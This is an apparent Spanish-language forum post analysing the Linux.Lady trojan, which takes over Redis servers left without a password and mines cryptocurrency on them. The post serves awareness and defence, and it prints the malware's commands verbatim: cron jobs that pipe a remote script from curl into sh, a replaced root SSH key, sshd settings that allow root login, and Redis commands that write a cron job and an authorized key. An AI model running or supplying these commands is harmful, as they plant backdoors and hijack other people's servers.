Troyano Linux.Lady: Usa los servidores para minar Bitcoins

[h]Se ha detectado un troyano llamado Linux.Lady diseñado contra los servidores que usan por defecto Redis NoSQL[/h]

https://www.wifi-libre.com/img/members/3/Ladylinux_1.jpg

Hay tan pocos troyanos para Linux que es casi todo un evento cuando sale uno. :smiley:
El problema para ellos es que no pasan desaparecidos mucho tiempo: No es fácil esconderse en un código abierto.
Los de** Doctorweb** acaban de publicar un reporte sobre uno de estos bichos raros pillado en acción que responde al nombre de Linux.Lady
[list=*]
]Linux.Lady.1 @ Doctor Web Antivirus/]
[/list]
Es un malware que afecta a las distribuciones Linux para servidores
Explota la “ignorancia” (o falta de atención) de los administradores lo más descuidados (o ignorantes): Compromete los sistemas que emplean Redis NoSQL por defecto y que no tienen una contraseña habilitada/configurada para limitar el uso este programa.

A pesar de que “proteger con contraseña” sea la base de este oficio y la piedra angular de la seguridad, se estima que podría haber hasta **30 000 **servidores vulnerables.
Parte de la responsabilidad cae en los hombros de VMware y Pivotal (los que lanzaron Redis) por proponer une configuración por defecto insegura.
Los datos SQL son un tesoro a proteger.
Redis se promociona como siendo “liviano y rápido”
Es justamente por falta de proceso de identificación que logra estos aparentes buenos resultados… :stuck_out_tongue:
Sacrificar la seguridad para engañar a los más bobos no está bien…

Hay que reconocer que nuestra Linux.Lady tiene clase.
No es un virus destructivo a lo tonto sino un parásito que sabe encontrar el equilibrio entre chupar los recursos de su huésped y dejarlo vivo.
Con capacidad a propagarse.
Sus principales características son
[list=1]
]Recoge información sobre la maquina infectada y la manda al servidor de control remoto/]
]Descarga y instala en la maquina infectada un programa de criptografía /]
]Ataca los otros ordenadores de la red para auto-replicarse/]
[/list]
En resumen es un malware que crea un parque de zombis dedicados a “minar Bit Coins”

El troyano crea un ejecutable /usr/sbin/ntp y un fichero de configuración ** /etc/systemd/system/ntp.service ** que tiene esta pinta:

[Unit] Description=NTP daemon ConditionFileIsExecutable=/usr/sbin/ntp [Service] StartLimitInterval=5 StartLimitBurst=10 ExecStart=/usr/sbin/ntp "-D" Restart=always RestartSec=120 [Install] WantedBy=multi-user.target

Una vez cómodamente instalada; La Linux.Lady empieza su labor y crea cuatros canales.
Manda al servidor remoto información sobre la maquina infectada:
[list=*]
]Versión de Lady.Linux/]
]Cuantas CPU tiene la maquina infectada/]
]nombre del huésped/]
]Cuantos procesos están corriendo/]
]nombre del Sistema Operativo/]
]A que “familia” pertenece el sistema operativo/]
]Tiempo de actividad el huésped/]
[/list]

A cambio de esto recibe un fichero de configuración a medida para entrar en acción: Descargar, instalar y ejecutar un programa de criptografía (escrito en lenguaje go) para minar BitCoins.
Determina una IP externa para establecer una conexión directa hacía el servidor del atacante usando el puerto 6379 sin autenticarse (es el puerto que usa Redis)
Si consigue contactar con el servidor descarga desde la url del fichero de configuración un script (** Linux.DownLoader.196,**) que instala en el cron scheduler (planificación de procesos/rutinas programadas)
Esto es lo que hace nuestra “Lady”

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * curl -fsSL http://r.*****ring.com/pm.sh?0706 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/10 * * * * curl -fsSL http://r. *****ring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root if ! -f "/root/.ssh/KHK75NEOiq" ]; then mkdir -p ~/.ssh rm -f ~/.ssh/authorized_keys* echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config echo "RSAAuthentication yes" >> /etc/ssh/sshd_config echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config /etc/init.d/sshd restart fi if ! -f "/etc/init.d/ntp" ]; then if ! -f "/etc/systemd/system/ntp.service" ]; then mkdir -p /opt curl -fsSL http://r. ****ring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install fi fi /etc/init.d/ntp start ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9

Una vez la conexión establecida el troyano ejecuta estas ordenes

config set stop-writes-on-bgsave-error no config set rdbcompression no config set dir /var/spool/cron config set dbfilename root set 1 ("\n\n*/1 * * * * curl -L %s | sh\n\n") % (ShellUrl из конфига) save config set dir /root/.ssh config set dbfilename authorized_keys set 1 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA4TjWxZeA8JlaBwfvgtjvDT0bm9d4JGbzz1KIIGyvSKxd7bqYLwXfxr0Q+tZxF5nHXldH2pRNacD7Gm8XX4aZCUYlL5Ev0goYmOTgXOQNkgyVQKPE6KGV5BZpNoB2sbIkuweLbbdZaOcncnFvAEh7dVUQ5lh2QLz/IuRzakrzaJeTPiaD3BAyXhjcVwDFn1Lb84uiqc7nW6gw2bIaSMOrNTfZH/xftGdI'UpJoQK06jmFrTlpWaL5joAooc2Evan6XnqkO4g5In7tjhX8pBtCBGk78SKCJmkEjK'+xbN+7oZhuaeB/ubPm3xDahi+w1xHGZIt/N7z268Fz3rQAhBUZ+eQ== save del 1 set dir /tmp set dbfilename dump.rdb config set rdbcompression yes

Incluyendo así una llave SSH valida para conectarse mediante este protocolo desde el sistema huésped hacia el servidor remoto.
La maquina infectada ejecutará por SSH y con esta llave

(curl -fsSL %s?ssh | sh) % (ShellUrl)

Para instalar el programa para minar Bit Coins
Se trata de un conjunto de librerías “Go” alojadas en GitHub
Podéis ver aquí su arborescencia (No se ve muy bien, lo siento, así es la captura que pusieron)
https://www.wifi-libre.com/img/members/3/Ladylinux_2.jpg

Más lectura
[list=*]
]Linux.Lady trojan turns Linux servers into bitcoin miners de Graeme BURTON @ The Enquirer/]
[/list]